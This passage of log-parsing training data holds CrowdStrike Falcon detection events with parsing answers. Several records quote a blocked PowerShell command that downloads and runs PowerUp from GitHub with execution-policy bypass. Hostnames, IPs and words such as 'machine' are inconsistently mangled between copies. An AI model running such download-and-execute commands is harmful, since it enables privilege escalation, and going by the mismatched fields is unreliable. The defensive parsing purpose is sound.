malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\App_Web_kvvwjyjq.dll\",\"user_name\":\"nighthawk\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1249\",\"control_graph_id\":\"ctg:289d83eb622a40d58196e54957152b03:60130083149\",\"triggering_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770815250147\",\"sha256\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\pqwjm4kv.cmdline\\\"\",\"parent_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770812509131\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mumbrellaine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=80.162.166.176 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-25T11:20:20Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "80.162.166.176",
"userName": "nighthawk"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mumbrellaine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mumbrellaine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mumbrellaine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=80.162.166.176 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mumbrellaine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mumbrellaine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mumbrellaine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=80.162.166.176 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVISAASQATWEB01.devnvi.paygoint.com
clientmac: 0accca51756b
filehash: 1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5
filename: VBCSCompiler.exe
filepath: \Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-25T11:20:20Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 80.162.166.176
userName: nighthawk | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=174.74.207.62 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "N/A",
"filename": "powershell.exe",
"filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"4712\",\"behavior_id\":\"10166\",\"filename\":\"powershell.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"scenario\":\"attacker_methodology\",\"objective\":\"Follow Through\",\"tactic\":\"Execution\",\"tactic_id\":\"TA0002\",\"technique\":\"PowerShell\",\"technique_id\":\"T1059.001\",\"display_name\":\"PShellDownloadRun\",\"description\":\"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"command_line\",\"ioc_value\":\"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks\",\"ioc_source\":\"interactive_script\",\"ioc_description\":\"\",\"user_name\":\"bob\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\",\"sha256\":\"N/A\",\"md5\":\"N/A\",\"parent_details\":{\"parent_sha256\":\"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c\",\"parent_md5\":\"c6cd12bf63e9b9b4478e6f975e7c293d\",\"parent_cmdline\":\"C:\\\\Windows\\\\Explorer.EXE\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=174.74.207.62 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-29T16:44:43Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "174.74.207.62",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=174.74.207.62 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=174.74.207.62 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: N/A
filename: powershell.exe
filepath: \Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-29T16:44:43Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 174.74.207.62
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=233.87.19.2 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "N/A",
"filename": "powershell.exe",
"filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"4712\",\"behavior_id\":\"10166\",\"filename\":\"powershell.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"scenario\":\"attacker_methodology\",\"objective\":\"Follow Through\",\"tactic\":\"Execution\",\"tactic_id\":\"TA0002\",\"technique\":\"PowerShell\",\"technique_id\":\"T1059.001\",\"display_name\":\"PShellDownloadRun\",\"description\":\"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"command_line\",\"ioc_value\":\"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks\",\"ioc_source\":\"interactive_script\",\"ioc_description\":\"\",\"user_name\":\"bob\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\",\"sha256\":\"N/A\",\"md5\":\"N/A\",\"parent_details\":{\"parent_sha256\":\"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c\",\"parent_md5\":\"c6cd12bf63e9b9b4478e6f975e7c293d\",\"parent_cmdline\":\"C:\\\\Windows\\\\Explorer.EXE\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=233.87.19.2 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-29T16:44:43Z",
"tags": [
"Crowdstrike Detection",
